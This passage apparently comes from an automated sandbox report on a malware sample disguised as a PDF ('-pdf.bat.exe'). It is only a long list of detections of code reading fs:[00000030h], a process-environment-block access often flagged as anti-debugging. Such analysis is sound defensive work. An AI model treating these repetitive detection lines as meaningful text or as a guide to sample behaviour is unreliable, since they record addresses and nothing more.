        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D64A mov eax, dword ptr fs:[00000030h]2_2_3261D64A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D64A mov eax, dword ptr fs:[00000030h]2_2_3261D64A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov ecx, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265265C mov eax, dword ptr fs:[00000030h]2_2_3265265C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265265C mov ecx, dword ptr fs:[00000030h]2_2_3265265C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265265C mov eax, dword ptr fs:[00000030h]2_2_3265265C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C mov ecx, dword ptr fs:[00000030h]2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C mov ecx, dword ptr fs:[00000030h]2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C mov eax, dword ptr fs:[00000030h]2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32625622 mov eax, dword ptr fs:[00000030h]2_2_32625622
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32625622 mov eax, dword ptr fs:[00000030h]2_2_32625622
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32627623 mov eax, dword ptr fs:[00000030h]2_2_32627623
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32620630 mov eax, dword ptr fs:[00000030h]2_2_32620630
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650630 mov eax, dword ptr fs:[00000030h]2_2_32650630
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B3608 mov eax, dword ptr fs:[00000030h]2_2_326B3608
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D600 mov eax, dword ptr fs:[00000030h]2_2_3264D600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D600 mov eax, dword ptr fs:[00000030h]2_2_3264D600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF607 mov eax, dword ptr fs:[00000030h]2_2_326DF607
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265360F mov eax, dword ptr fs:[00000030h]2_2_3265360F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4600 mov eax, dword ptr fs:[00000030h]2_2_326F4600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326196E0 mov eax, dword ptr fs:[00000030h]2_2_326196E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326196E0 mov eax, dword ptr fs:[00000030h]2_2_326196E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262C6E0 mov eax, dword ptr fs:[00000030h]2_2_3262C6E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326256E0 mov eax, dword ptr fs:[00000030h]2_2_326256E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326256E0 mov eax, dword ptr fs:[00000030h]2_2_326256E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326256E0 mov eax, dword ptr fs:[00000030h]2_2_326256E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326466E0 mov eax, dword ptr fs:[00000030h]2_2_326466E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326466E0 mov eax, dword ptr fs:[00000030h]2_2_326466E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326206CF mov eax, dword ptr fs:[00000030h]2_2_326206CF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EA6C0 mov eax, dword ptr fs:[00000030h]2_2_326EA6C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D6D0 mov eax, dword ptr fs:[00000030h]2_2_3264D6D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E86A8 mov eax, dword ptr fs:[00000030h]2_2_326E86A8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E86A8 mov eax, dword ptr fs:[00000030h]2_2_326E86A8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF68C mov eax, dword ptr fs:[00000030h]2_2_326DF68C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630680 mov eax, dword ptr fs:[00000030h]2_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32628690 mov eax, dword ptr fs:[00000030h]2_2_32628690
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269D69D mov eax, dword ptr fs:[00000030h]2_2_3269D69D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32632760 mov ecx, dword ptr fs:[00000030h]2_2_32632760
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 mov eax, dword ptr fs:[00000030h]2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650774 mov eax, dword ptr fs:[00000030h]2_2_32650774
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624779 mov eax, dword ptr fs:[00000030h]2_2_32624779
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624779 mov eax, dword ptr fs:[00000030h]2_2_32624779
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32653740 mov eax, dword ptr fs:[00000030h]2_2_32653740
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265174A mov eax, dword ptr fs:[00000030h]2_2_3265174A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F75B mov eax, dword ptr fs:[00000030h]2_2_3261F75B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CE750 mov eax, dword ptr fs:[00000030h]2_2_326CE750
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623722 mov eax, dword ptr fs:[00000030h]2_2_32623722
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623722 mov eax, dword ptr fs:[00000030h]2_2_32623722
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D700 mov ecx, dword ptr fs:[00000030h]2_2_3262D700
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B705 mov eax, dword ptr fs:[00000030h]2_2_3261B705
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E970B mov eax, dword ptr fs:[00000030h]2_2_326E970B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E970B mov eax, dword ptr fs:[00000030h]2_2_326E970B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C mov eax, dword ptr fs:[00000030h]2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C mov eax, dword ptr fs:[00000030h]2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C mov eax, dword ptr fs:[00000030h]2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262471B mov eax, dword ptr fs:[00000030h]2_2_3262471B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262471B mov eax, dword ptr fs:[00000030h]2_2_3262471B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF717 mov eax, dword ptr fs:[00000030h]2_2_326DF717
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264E7E0 mov eax, dword ptr fs:[00000030h]2_2_3264E7E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326237E4 mov eax, dword ptr fs:[00000030h]2_2_326237E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326277F9 mov eax, dword ptr fs:[00000030h]2_2_326277F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326277F9 mov eax, dword ptr fs:[00000030h]2_2_326277F9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF7CF mov eax, dword ptr fs:[00000030h]2_2_326DF7CF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326207A7 mov eax, dword ptr fs:[00000030h]2_2_326207A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ED7A7 mov eax, dword ptr fs:[00000030h]2_2_326ED7A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ED7A7 mov eax, dword ptr fs:[00000030h]2_2_326ED7A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ED7A7 mov eax, dword ptr fs:[00000030h]2_2_326ED7A7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F17BC mov eax, dword ptr fs:[00000030h]2_2_326F17BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB781 mov eax, dword ptr fs:[00000030h]2_2_326FB781
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB781 mov eax, dword ptr fs:[00000030h]2_2_326FB781
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32651796 mov eax, dword ptr fs:[00000030h]2_2_32651796
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32651796 mov eax, dword ptr fs:[00000030h]2_2_32651796
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3269E79D mov eax, dword ptr fs:[00000030h]2_2_3269E79D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EA464 mov eax, dword ptr fs:[00000030h]2_2_326EA464
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF478 mov eax, dword ptr fs:[00000030h]2_2_326DF478
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630445 mov eax, dword ptr fs:[00000030h]2_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630445 mov eax, dword ptr fs:[00000030h]2_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630445 mov eax, dword ptr fs:[00000030h]2_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630445 mov eax, dword ptr fs:[00000030h]2_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630445 mov eax, dword ptr fs:[00000030h]2_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630445 mov eax, dword ptr fs:[00000030h]2_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D454 mov eax, dword ptr fs:[00000030h]2_2_3262D454
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D454 mov eax, dword ptr fs:[00000030h]2_2_3262D454
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D454 mov eax, dword ptr fs:[00000030h]2_2_3262D454
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D454 mov eax, dword ptr fs:[00000030h]2_2_3262D454
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D454 mov eax, dword ptr fs:[00000030h]2_2_3262D454
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262D454 mov eax, dword ptr fs:[00000030h]2_2_3262D454
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32657425 mov eax, dword ptr fs:[00000030h]2_2_32657425
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32657425 mov ecx, dword ptr fs:[00000030h]2_2_32657425
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B420 mov eax, dword ptr fs:[00000030h]2_2_3261B420
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AF42F mov eax, dword ptr fs:[00000030h]2_2_326AF42F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AF42F mov eax, dword ptr fs:[00000030h]2_2_326AF42F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AF42F mov eax, dword ptr fs:[00000030h]2_2_326AF42F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AF42F mov eax, dword ptr fs:[00000030h]2_2_326AF42F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AF42F mov eax, dword ptr fs:[00000030h]2_2_326AF42F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261640D mov eax, dword ptr fs:[00000030h]2_2_3261640D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF4FD mov eax, dword ptr fs:[00000030h]2_2_326DF4FD
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326264F0 mov eax, dword ptr fs:[00000030h]2_2_326264F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326494FA mov eax, dword ptr fs:[00000030h]2_2_326494FA
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326414C9 mov eax, dword ptr fs:[00000030h]2_2_326414C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326414C9 mov eax, dword ptr fs:[00000030h]2_2_326414C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326414C9 mov eax, dword ptr fs:[00000030h]2_2_326414C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326414C9 mov eax, dword ptr fs:[00000030h]2_2_326414C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326414C9 mov eax, dword ptr fs:[00000030h]2_2_326414C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F4D0 mov eax, dword ptr fs:[00000030h]2_2_3264F4D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326444D1 mov eax, dword ptr fs:[00000030h]2_2_326444D1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326444D1 mov eax, dword ptr fs:[00000030h]2_2_326444D1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326224A2 mov eax, dword ptr fs:[00000030h]2_2_326224A2
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326224A2 mov ecx, dword ptr fs:[00000030h]2_2_326224A2
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AD4A0 mov ecx, dword ptr fs:[00000030h]2_2_326AD4A0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AD4A0 mov eax, dword ptr fs:[00000030h]2_2_326AD4A0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AD4A0 mov eax, dword ptr fs:[00000030h]2_2_326AD4A0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326544A8 mov eax, dword ptr fs:[00000030h]2_2_326544A8
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E4BC mov eax, dword ptr fs:[00000030h]2_2_3265E4BC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32620485 mov ecx, dword ptr fs:[00000030h]2_2_32620485
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265B490 mov eax, dword ptr fs:[00000030h]2_2_3265B490
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265B490 mov eax, dword ptr fs:[00000030h]2_2_3265B490
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AC490 mov eax, dword ptr fs:[00000030h]2_2_326AC490
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263C560 mov eax, dword ptr fs:[00000030h]2_2_3263C560
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263E547 mov eax, dword ptr fs:[00000030h]2_2_3263E547
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32656540 mov eax, dword ptr fs:[00000030h]2_2_32656540
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262254C mov eax, dword ptr fs:[00000030h]2_2_3262254C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB55F mov eax, dword ptr fs:[00000030h]2_2_326FB55F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326FB55F mov eax, dword ptr fs:[00000030h]2_2_326FB55F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EA553 mov eax, dword ptr fs:[00000030h]2_2_326EA553
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32651527 mov eax, dword ptr fs:[00000030h]2_2_32651527
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263252B mov eax, dword ptr fs:[00000030h]2_2_3263252B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623536 mov eax, dword ptr fs:[00000030h]2_2_32623536
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623536 mov eax, dword ptr fs:[00000030h]2_2_32623536
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261753F mov eax, dword ptr fs:[00000030h]2_2_3261753F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261753F mov eax, dword ptr fs:[00000030h]2_2_3261753F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261753F mov eax, dword ptr fs:[00000030h]2_2_3261753F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662539 mov eax, dword ptr fs:[00000030h]2_2_32662539
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32622500 mov eax, dword ptr fs:[00000030h]2_2_32622500
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B502 mov eax, dword ptr fs:[00000030h]2_2_3261B502
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265C50D mov eax, dword ptr fs:[00000030h]2_2_3265C50D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265C50D mov eax, dword ptr fs:[00000030h]2_2_3265C50D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32641514 mov eax, dword ptr fs:[00000030h]2_2_32641514
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32641514 mov eax, dword ptr fs:[00000030h]2_2_32641514
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32641514 mov eax, dword ptr fs:[00000030h]2_2_32641514
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32641514 mov eax, dword ptr fs:[00000030h]2_2_32641514
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32641514 mov eax, dword ptr fs:[00000030h]2_2_32641514
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32641514 mov eax, dword ptr fs:[00000030h]2_2_32641514
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov ecx, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov ecx, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
